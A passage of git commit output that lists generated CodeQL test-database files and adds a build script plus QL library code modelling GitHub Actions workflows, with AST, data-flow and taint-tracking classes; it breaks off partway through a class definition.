ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/9f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/version create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/files.rel create mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/folders.rel create mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json create mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log create mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log create mode 100644 ql/src/test-db/src.zip create mode 100644 ql/src/test/changed-files.yml create mode 100644 ql/src/test/inter1.yml create mode 100644 ql/src/test/no-flow1.yml create mode 100644 ql/src/test/no-flow2.yml create mode 100644 ql/src/test/simple1.yml create mode 100644 ql/src/test/simple2.yml create mode 100644 ql/src/test/test.ql create mode 100644 ql/src/test/test.yml diff --git a/build-dbs.sh b/build-dbs.sh new file mode 100755 index 00000000000..dac4753f4d6 --- /dev/null +++ b/build-dbs.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf ql/src/test-db || true +rm -rf ql/lib/test-db || true +codeql database create ql/src/test-db -l yaml -s ql/src/test +codeql database create ql/lib/test-db -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml new file mode 100644 index 00000000000..ad62591967d --- /dev/null +++ b/codeql-workspace.yml @@ -0,0 +1,3 @@ +provide: + - "**/ql/src/qlpack.yml" + - "**/ql/lib/qlpack.yml" \ No newline at end of file diff --git a/ql/lib/actions.qll b/ql/lib/actions.qll new file mode 100644 index 00000000000..2c1d1cee925 --- /dev/null +++ b/ql/lib/actions.qll @@ -0,0 +1 @@ +import codeql.actions.Ast diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 00000000000..56f10b81e0c --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll new file mode 100644 index 00000000000..3a16bdec40d --- /dev/null +++ b/ql/lib/codeql/Locations.qll @@ -0,0 +1,71 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends @location_default { + /** Gets the file for this location. */ + File getFile() { locations_default(this, result, _, _, _, _) } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { locations_default(this, _, result, _, _, _) } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { locations_default(this, _, _, result, _, _) } + + /** Gets the 1-based line number (inclusive) where this location ends. */ + int getEndLine() { locations_default(this, _, _, _, result, _) } + + /** Gets the 1-based column number (inclusive) where this location ends. */ + int getEndColumn() { locations_default(this, _, _, _, _, result) } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + exists(File f | + locations_default(this, f, startline, startcolumn, endline, endcolumn) and + filepath = f.getAbsolutePath() + ) + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 00000000000..967a969a6b7 --- /dev/null +++ b/ql/lib/codeql/actions/Ast.qll @@ -0,0 +1,256 @@ +private import codeql.actions.ast.internal.Actions +private import codeql.Locations + +class AstNode instanceof YamlNode { + AstNode getParentNode() { + if exists(YamlMapping m | m.maps(_, this)) + then exists(YamlMapping m | m.maps(result, this)) + else result = super.getParentNode() + } + + AstNode getAChildNode() { + if this instanceof YamlMapping + then this.(YamlMapping).maps(result, _) + else + if this instanceof YamlCollection + then result = super.getChildNode(_) + else + if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + then exists(YamlMapping m | m.maps(this, result)) + else none() + } + + AstNode getChildNodeByOrder(int i) { + result = + rank[i](Expression child, Location l | + child = this.getAChildNode() and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } + + string toString() { result = super.toString() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } +} + +class Statement extends AstNode { + // narrow down to something that is a statement + // A statement is a group of expressions and/or statements that you design to carry out a task or an action. + // Any statement that can return a value is automatically qualified to be used as an expression. +} + +class Expression extends Statement { + // narrow down to something that is an expression + // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +} + +/** + * A Job is a collection of steps that run in an execution environment. + */ +class JobStmt extends Statement instanceof Actions::Job { + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = super.getId() } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + /** Gets the step at the given index within this job. */ + StepStmt getStep(int index) { result = super.getStep(index) } + + /** Gets any steps that are defined within this job. */ + StepStmt getAStep() { result = super.getStep(_) } + + JobStmt getNeededJob() { + exists(Actions::Needs needs | + needs.getJob() = this and + result = needs.getANeededJob().(JobStmt) + ) + } + + Expression getJobOutputExpr(string varName) { + this.(Actions::Job) + .lookup("outputs") + .(YamlMapping) + .maps(any(YamlScalar a | a.getValue() = varName), result) + } + + JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + Statement getSuccNode(int i) { + result = + rank[i](Expression child, Location l | + (child = this.getAStep() or child = this.getJobOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +class JobOutputStmt extends Statement instanceof YamlMapping { + JobStmt job; + + JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } + + StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } +} + +/** + * A Step is a single task that can be executed as part of a job. + */ +class StepStmt extends Statement instanceof Actions::Step { + string getId() { result = super.getId() } + + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + JobStmt getJob() { result = super.getJob() } + + abstract AstNode getSuccNode(int i); +} + +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class UsesExpr extends StepStmt, Expression { + Actions::Uses uses; + + UsesExpr() { uses.getStep() = this } + + string getTarget() { result = uses.getGitHubRepository() } + + string getVersion() { result = uses.getVersion() } + + Expression getArgument(string key) { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(key) + ) + } + + Expression getArgumentByOrder(int i) { + exists(Actions::With with | + with.getStep() = uses.getStep() and + result = + rank[i](Expression child, Location l | + child = with.lookup(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + ) + } + + Expression getAnArgument() { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(_) + ) + } + + override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } +} + +/** + * An argument passed to a UsesExpr. + */ +class ArgumentExpr extends Expression { + UsesExpr uses; + + ArgumentExpr() { this = uses.getAnArgument() } +} + +/** + * A Run step represents a call to an inline script or executable on the runner machine. + */ +class RunExpr extends StepStmt { + Actions::Run scriptExpr; + + RunExpr() { scriptExpr.getStep() = this } + + Expression getScriptExpr() { result = scriptExpr } + + string getScript() { result = scriptExpr.getValue() } + + override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } +} + +/** + * A YAML string containing a workflow expression. + */ +class ExprAccessExpr extends Expression instanceof YamlString { + string expr; + + ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + JobStmt getJob() { result.getAChildNode*() = this } +} + +/** + * A ExprAccessExpr where the expression references a step output. + * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepOutputAccessExpr extends ExprAccessExpr { + string stepId; + string varName; + + StepOutputAccessExpr() { + stepId = + this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getStepId() { result = stepId } + + string getVarName() { result = varName } + + StepStmt getStep() { result.getId() = stepId } +} + +/** + * A ExprAccessExpr where the expression references a job output. + * eg: `${{ needs.job1.outputs.foo}}` + */ +class JobOutputAccessExpr extends ExprAccessExpr { + string jobId; + string varName; + + JobOutputAccessExpr() { + jobId = + this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getVarName() { result = varName } + + Expression getOutputExpr() { + exists(JobStmt job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getJobOutputExpr(varName) = result + ) + } +} diff --git a/ql/lib/codeql/actions/Cfg.qll b/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 00000000000..df7acf4e1c0 --- /dev/null +++ b/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,7 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll new file mode 100644 index 00000000000..d1e714e8fbc --- /dev/null +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) data flow analyses. + */ +module DataFlow { + private import codeql.dataflow.DataFlow + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + import DataFlowMake + import codeql.actions.dataflow.internal.DataFlowPublic +} diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll new file mode 100644 index 00000000000..16d5d826aa8 --- /dev/null +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ +module TaintTracking { + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + private import codeql.dataflow.TaintTracking + import TaintFlowMake +} diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll new file mode 100644 index 00000000000..e3be61fd3b9 --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -0,0 +1,400 @@ +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + +import codeql.actions.ast.internal.Yaml +import codeql.files.FileSystem + +// ALVARO: Make it private +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ +module Actions { + /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ + private class Node extends YamlNode { + Node() { + exists(File f | + f = this.getLocation().getFile() and + ( + f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or + f.getBaseName() = ["action.yml", "action.yaml"] or + // ALVARO: Add any yaml files temporary for development + f.getExtension() = ["yml", "yaml"] + ) + ) + } + } + + /** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ + class CompositeAction extends Node, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } + + /** Gets the `runs` mapping. */ + Runs getRuns() { result = this.lookup("runs") } + } + + /** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ + class Runs extends StepsContainer { + CompositeAction action; + + Runs() { action.lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } + + /** Gets the `using` mapping. */ + Using getUsing() { result = this.lookup("using") } + } + + /** + * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) + */ + abstract class StepsContainer extends YamlNode, YamlMapping { + /** Gets the sequence of `steps` within this YAML node. */ + YamlSequence getSteps() { result = this.lookup("steps") } + } + + /** + * A `using` mapping in a custom composite action YAML. + */ + class Using extends YamlNode, YamlScalar { + Runs runs; + + Using() { runs.lookup("using") = this } + + /** Gets the `runs` mapping that this `using` mapping is in. */ + Runs getRuns() { result = runs } + } + + /** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + class Workflow extends Node, YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = this.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = this.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = this.lookup("name").(YamlString).getValue() } + + /** Gets the name of the workflow file. */ + string getFileName() { result = this.getFile().getBaseName() } + + /** Gets the `on:` in this workflow. */ + On getOn() { result = this.lookup("on") } + + /** Gets the job within this workflow with the given job ID. */ + Job 